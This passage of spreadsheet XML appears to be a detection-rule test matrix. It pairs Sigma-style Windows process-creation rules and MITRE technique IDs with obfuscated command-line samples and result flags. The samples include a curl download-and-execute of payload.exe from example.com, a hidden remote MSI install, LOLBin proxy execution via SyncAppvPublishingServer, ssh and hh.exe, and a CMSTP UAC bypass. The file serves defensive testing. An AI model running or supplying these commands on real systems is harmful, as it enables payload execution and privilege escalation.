          <t>proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh</t>
        </is>
      </c>
      <c r="C405" s="36" t="inlineStr">
        <is>
          <t>SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code</t>
        </is>
      </c>
      <c r="D405" s="36" t="inlineStr">
        <is>
          <t>36475a7d-0f6d-4dce-9b01-6aeb473bbaf1</t>
        </is>
      </c>
      <c r="E405" s="43" t="inlineStr">
        <is>
          <t>C:\windows\system32\SyncAppvPublishingServer.vbs "
%3bStart-Process calc"</t>
        </is>
      </c>
      <c r="F405" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G405" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H405" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I405" s="43" t="n"/>
      <c r="J405" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K405" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="406" ht="15.75" customHeight="1" s="42">
      <c r="A406" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B406" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh</t>
        </is>
      </c>
      <c r="C406" s="36" t="inlineStr">
        <is>
          <t>SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code</t>
        </is>
      </c>
      <c r="D406" s="36" t="inlineStr">
        <is>
          <t>36475a7d-0f6d-4dce-9b01-6aeb473bbaf1</t>
        </is>
      </c>
      <c r="E406" s="36" t="inlineStr">
        <is>
          <t>"cmd.exe" /c C:\windows\system32\SyncAppvPublishingServer.vbs "
"';'"Start-Process calc"</t>
        </is>
      </c>
      <c r="F406" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G406" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H406" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I406" s="43" t="n"/>
      <c r="J406" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K406" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="407" ht="15.75" customHeight="1" s="42">
      <c r="A407" s="43" t="n"/>
      <c r="B407" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_curl_download_exec_combo</t>
        </is>
      </c>
      <c r="C407" s="36" t="inlineStr">
        <is>
          <t>Curl Download And Execute Combination</t>
        </is>
      </c>
      <c r="D407" s="36" t="inlineStr">
        <is>
          <t>21dd6d38-2b18-4453-9404-a0fe4a0cc288</t>
        </is>
      </c>
      <c r="E407" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"c" "curl http://example.com/payload.exe -o payload.exe ; .\payload.exe"</t>
        </is>
      </c>
      <c r="F407" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G407" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H407" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I407" s="43" t="n"/>
      <c r="J407" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K407" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="408" ht="15.75" customHeight="1" s="42">
      <c r="A408" s="43" t="n"/>
      <c r="B408" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_curl_download_exec_combo</t>
        </is>
      </c>
      <c r="C408" s="36" t="inlineStr">
        <is>
          <t>Curl Download And Execute Combination</t>
        </is>
      </c>
      <c r="D408" s="36" t="inlineStr">
        <is>
          <t>21dd6d38-2b18-4453-9404-a0fe4a0cc288</t>
        </is>
      </c>
      <c r="E408" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"c" "curl http://example.com/payload.exe -o payload.exe ; .\payload.exe"</t>
        </is>
      </c>
      <c r="F408" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G408" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H408" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I408" s="43" t="n"/>
      <c r="J408" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K408" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="409" ht="15.75" customHeight="1" s="42">
      <c r="A409" s="43" t="n"/>
      <c r="B409" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_redirection_susp_folder</t>
        </is>
      </c>
      <c r="C409" s="36" t="inlineStr">
        <is>
          <t>Potentially Suspicious CMD Shell Output Redirect</t>
        </is>
      </c>
      <c r="D409" s="36" t="inlineStr">
        <is>
          <t>8e0bb260-d4b2-4fff-bb8d-3f82118e6892</t>
        </is>
      </c>
      <c r="E409" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd C:\Windows\Temp &amp;&amp; hostname &gt; output.txt"</t>
        </is>
      </c>
      <c r="F409" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G409" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H409" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I409" s="43" t="n"/>
      <c r="J409" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K409" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="410" ht="15.75" customHeight="1" s="42">
      <c r="A410" s="43" t="n"/>
      <c r="B410" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_redirection_susp_folder</t>
        </is>
      </c>
      <c r="C410" s="36" t="inlineStr">
        <is>
          <t>Potentially Suspicious CMD Shell Output Redirect</t>
        </is>
      </c>
      <c r="D410" s="36" t="inlineStr">
        <is>
          <t>8e0bb260-d4b2-4fff-bb8d-3f82118e6892</t>
        </is>
      </c>
      <c r="E410" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "set p=C:\ProgramData\ &amp;&amp; call echo recon_data &gt; %p%out.txt"</t>
        </is>
      </c>
      <c r="F410" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G410" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H410" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I410" s="43" t="n"/>
      <c r="J410" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K410" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="411" ht="15.75" customHeight="1" s="42">
      <c r="A411" s="43" t="n"/>
      <c r="B411" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C411" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D411" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E411" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd C:\Users\Public\Downloads &amp;&amp; hh.exe payload.chm"</t>
        </is>
      </c>
      <c r="F411" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G411" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H411" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I411" s="43" t="n"/>
      <c r="J411" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K411" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="412" ht="15.75" customHeight="1" s="42">
      <c r="A412" s="43" t="n"/>
      <c r="B412" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C412" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D412" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E412" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd C:\Users\Victim\Downloads\ &amp;&amp; hh.exe payload.chm"</t>
        </is>
      </c>
      <c r="F412" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G412" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H412" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I412" s="43" t="n"/>
      <c r="J412" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K412" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="413" ht="15.75" customHeight="1" s="42">
      <c r="A413" s="43" t="n"/>
      <c r="B413" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C413" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D413" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E413" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd %USERPROFILE%\Downloads &amp;&amp; hh.exe payload.chm"</t>
        </is>
      </c>
      <c r="F413" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G413" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H413" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I413" s="43" t="n"/>
      <c r="J413" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K413" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="414" ht="15.75" customHeight="1" s="42">
      <c r="A414" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B414" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_imewbdld_download</t>
        </is>
      </c>
      <c r="C414" s="36" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via IMEWDBLD.EXE</t>
        </is>
      </c>
      <c r="D414" s="36" t="inlineStr">
        <is>
          <t>863218bd-c7d0-4c52-80cd-0a96c09f54af</t>
        </is>
      </c>
      <c r="E414" s="36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F414" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G414" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H414" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I414" s="36" t="n"/>
      <c r="J414" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K414" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="415" ht="15.75" customHeight="1" s="42">
      <c r="A415" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B415" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_infdefaultinstall_execute_sct_scripts</t>
        </is>
      </c>
      <c r="C415" s="36" t="inlineStr">
        <is>
          <t>InfDefaultInstall.exe .inf Execution</t>
        </is>
      </c>
      <c r="D415" s="36" t="inlineStr">
        <is>
          <t>ce7cf472-6fcc-490a-9481-3786840b5d9b</t>
        </is>
      </c>
      <c r="E415" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "InfDefaultInstall.exe "C:\AtomicRedTeam\atomics\T1218\src\Infdefaultinstall.in^f""</t>
        </is>
      </c>
      <c r="F415" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G415" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H415" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I415" s="43" t="n"/>
      <c r="J415" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K415" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="416" ht="15.75" customHeight="1" s="42">
      <c r="A416" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B416" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_mofcomp_execution</t>
        </is>
      </c>
      <c r="C416" s="36" t="inlineStr">
        <is>
          <t>Potential Suspicious Mofcomp Execution</t>
        </is>
      </c>
      <c r="D416" s="36" t="inlineStr">
        <is>
          <t>1dd05363-104e-4b4a-b963-196a534b03a1</t>
        </is>
      </c>
      <c r="E416" s="36" t="inlineStr">
        <is>
          <t>"C:\windows\system32\wbem\mofcomp.exe" "C:\Users\Public"\T1546.003.mof</t>
        </is>
      </c>
      <c r="F416" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G416" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H416" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I416" s="36" t="n"/>
      <c r="J416" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K416" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="417" ht="15.75" customHeight="1" s="42">
      <c r="A417" s="43" t="n"/>
      <c r="B417" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C417" s="36" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D417" s="36" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E417" s="36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417" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G417" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H417" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I417" s="36" t="n"/>
      <c r="J417" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K417" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="418" ht="15.75" customHeight="1" s="42">
      <c r="A418" s="43" t="n"/>
      <c r="B418" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C418" s="36" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D418" s="36" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E418" s="36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18" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G418" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H418" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I418" s="36" t="n"/>
      <c r="J418" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K418" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="419" ht="15.75" customHeight="1" s="42">
      <c r="A419" s="43" t="n"/>
      <c r="B419" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C419" s="36" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D419" s="36" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E419" s="4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419" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G419" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H419" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I419" s="43" t="n"/>
      <c r="J419" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K419" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="420" ht="15.75" customHeight="1" s="42">
      <c r="A420" s="43" t="n"/>
      <c r="B420" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C420" s="43" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D420" s="43" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E420" s="4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420" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G420" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H420" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I420" s="43" t="n"/>
      <c r="J420" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K420" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="421" ht="15.75" customHeight="1" s="42">
      <c r="A421" s="36" t="n"/>
      <c r="B421" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C421" s="36" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D421" s="36" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E421" s="36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421" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G421" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H421" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I421" s="36" t="n"/>
      <c r="J421" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K421" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="422" ht="15.75" customHeight="1" s="42">
      <c r="A422" s="36" t="n"/>
      <c r="B422" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C422" s="36" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D422" s="36" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E422" s="36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422" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G422" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H422" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I422" s="36" t="n"/>
      <c r="J422" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K422" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="423" ht="15.75" customHeight="1" s="42">
      <c r="A423" s="36" t="n"/>
      <c r="B423" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C423" s="36" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D423" s="36" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E423" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -w Hidden /"C" "$u='ht'+'tps://example.com/';$i=New-Object -Com ('WindowsInstaller.Installer');$i.UILevel=2;$i.InstallProduct ( $u,'')"</t>
        </is>
      </c>
      <c r="F423" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G423" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H423" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I423" s="43" t="n"/>
      <c r="J423" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K423" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="424" ht="15.75" customHeight="1" s="42">
      <c r="A424" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B424" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_remotefxvgpudisablement_abuse</t>
        </is>
      </c>
      <c r="C424" s="36" t="inlineStr">
        <is>
          <t>RemoteFXvGPUDisablement Abuse Via AtomicTestHarnesses</t>
        </is>
      </c>
      <c r="D424" s="36" t="inlineStr">
        <is>
          <t>a6fc3c46-23b8-4996-9ea2-573f4c4d88c5</t>
        </is>
      </c>
      <c r="E424" s="36" t="inlineStr">
        <is>
          <t>"powershell.exe" &amp; {&amp; 'Invoke-ATHRemoteFXvGPUDisablementCommand' -ModuleName foo -ModulePath $PWD}</t>
        </is>
      </c>
      <c r="F424" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G424" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H424" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I424" s="36" t="n"/>
      <c r="J424" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K424" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="425" ht="15.75" customHeight="1" s="42">
      <c r="A425" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B425" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_ssh_proxy_execution</t>
        </is>
      </c>
      <c r="C425" s="36" t="inlineStr">
        <is>
          <t>Program Executed Using Proxy/Local Command Via SSH.EXE</t>
        </is>
      </c>
      <c r="D425" s="36" t="inlineStr">
        <is>
          <t>7d6d30b8-5b91-4b90-a891-46cccaf29598</t>
        </is>
      </c>
      <c r="E425" s="36" t="inlineStr">
        <is>
          <t>"C:\WINDOWS\System32\OpenSSH\ssh.exe" -o "PermitLocalCommand yes" -o "LocalCommand calc.exe" adversary-host</t>
        </is>
      </c>
      <c r="F425" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G425" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H425" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I425" s="36" t="n"/>
      <c r="J425" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K425" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="426" ht="15.75" customHeight="1" s="42">
      <c r="A426" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B426" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_ssh_proxy_execution</t>
        </is>
      </c>
      <c r="C426" s="36" t="inlineStr">
        <is>
          <t>Program Executed Using Proxy/Local Command Via SSH.EXE</t>
        </is>
      </c>
      <c r="D426" s="36" t="inlineStr">
        <is>
          <t>7d6d30b8-5b91-4b90-a891-46cccaf29598</t>
        </is>
      </c>
      <c r="E426" s="36" t="inlineStr">
        <is>
          <t>"C:\WINDOWS\System32\OpenSSH\ssh.exe" -o Proxy""Command="calc.exe" adversary-host</t>
        </is>
      </c>
      <c r="F426" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G426" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H426" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I426" s="36" t="n"/>
      <c r="J426" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K426" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="427" ht="15.75" customHeight="1" s="42">
      <c r="A427" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B427" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_ssh_proxy_execution</t>
        </is>
      </c>
      <c r="C427" s="36" t="inlineStr">
        <is>
          <t>Program Executed Using Proxy/Local Command Via SSH.EXE</t>
        </is>
      </c>
      <c r="D427" s="36" t="inlineStr">
        <is>
          <t>7d6d30b8-5b91-4b90-a891-46cccaf29598</t>
        </is>
      </c>
      <c r="E427" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "C:\WINDOWS\System32\OpenSSH\ssh.exe" -o Per^mitLocalCommand=yes -o LocalCommand=calc.exe adversary-host</t>
        </is>
      </c>
      <c r="F427" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G427" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H427" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I427" s="36" t="n"/>
      <c r="J427" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K427" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="428" ht="15.75" customHeight="1" s="42">
      <c r="A428" s="43" t="inlineStr">
        <is>
          <t>t1218.001</t>
        </is>
      </c>
      <c r="B428" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_chm_execution</t>
        </is>
      </c>
      <c r="C428" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution</t>
        </is>
      </c>
      <c r="D428" s="43" t="inlineStr">
        <is>
          <t>68c8acb4-1b60-4890-8e82-3ddf7a6dba84</t>
        </is>
      </c>
      <c r="E428" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "hh.exe -decompile C:\Users	haim\AppData\Local\Temp "C:\AtomicRedTeam\atomics\T1218.001\src\T1218.001.ch^m""</t>
        </is>
      </c>
      <c r="F428" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G428" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H428" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I428" s="43" t="n"/>
      <c r="J428" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K428" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="429" ht="15.75" customHeight="1" s="42">
      <c r="A429" s="43" t="inlineStr">
        <is>
          <t>t1218.001</t>
        </is>
      </c>
      <c r="B429" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_chm_remote_download_or_execution</t>
        </is>
      </c>
      <c r="C429" s="43" t="inlineStr">
        <is>
          <t>Remote CHM File Download/Execution Via HH.EXE</t>
        </is>
      </c>
      <c r="D429" s="43" t="inlineStr">
        <is>
          <t>f57c58b3-ee69-4ef5-9041-455bf39aaa89</t>
        </is>
      </c>
      <c r="E429" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "hh.exe htt^ps://[raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.001/src/T1218.001.chm](https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.001/src/T1218.001.chm)"</t>
        </is>
      </c>
      <c r="F429" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G429" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H429" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I429" s="43" t="n"/>
      <c r="J429" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K429" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="430" ht="15.75" customHeight="1" s="42">
      <c r="A430" s="36" t="n"/>
      <c r="B430" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C430" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D430" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E430" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd C:\Users\Public\Downloads &amp;&amp; hh.exe payload.chm"</t>
        </is>
      </c>
      <c r="F430" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G430" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H430" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I430" s="43" t="n"/>
      <c r="J430" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K430" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="431" ht="15.75" customHeight="1" s="42">
      <c r="A431" s="36" t="n"/>
      <c r="B431" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C431" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D431" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E431" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd C:\Users\Victim\Downloads\ &amp;&amp; hh.exe payload.chm"</t>
        </is>
      </c>
      <c r="F431" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G431" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H431" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I431" s="43" t="n"/>
      <c r="J431" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K431" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="432" ht="15.75" customHeight="1" s="42">
      <c r="A432" s="36" t="n"/>
      <c r="B432" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C432" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D432" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E432" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd %USERPROFILE%\Downloads &amp;&amp; hh.exe payload.chm"</t>
        </is>
      </c>
      <c r="F432" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G432" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H432" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I432" s="36" t="n"/>
      <c r="J432" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K432" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="433" ht="15.75" customHeight="1" s="42">
      <c r="A433" s="43" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B433" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_uac_bypass_cmstp</t>
        </is>
      </c>
      <c r="C433" s="36" t="inlineStr">
        <is>
          <t>Bypass UAC via CMSTP</t>
        </is>
      </c>
      <c r="D433" s="36" t="inlineStr">
        <is>
          <t>e66779cc-383e-4224-a3a4-267eeb585c40</t>
        </is>
      </c>
      <c r="E433" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "cmstp.exe /^s "C:\AtomicRedTeam\atomics\T1218.003\src\T1218.003_uacbypass.inf" /^a^u"</t>
        </is>
      </c>
      <c r="F433" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G433" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H433" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I433" s="43" t="n"/>
      <c r="J433" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K433" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="434" ht="15.75" customHeight="1" s="42">
      <c r="A434" s="43" t="inlineStr">
        <is>
          <t>t1218.005</t>
        </is>
      </c>
      <c r="B434" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_mshta_http</t>
        </is>
      </c>
      <c r="C434" s="36" t="inlineStr">
        <is>
          <t>Remotely Hosted HTA File Executed Via Mshta.EXE</t>
        </is>
      </c>
      <c r="D434" s="36" t="inlineStr">
        <is>
          <t>b98d0db6-511d-45de-ad02-e82a98729620</t>
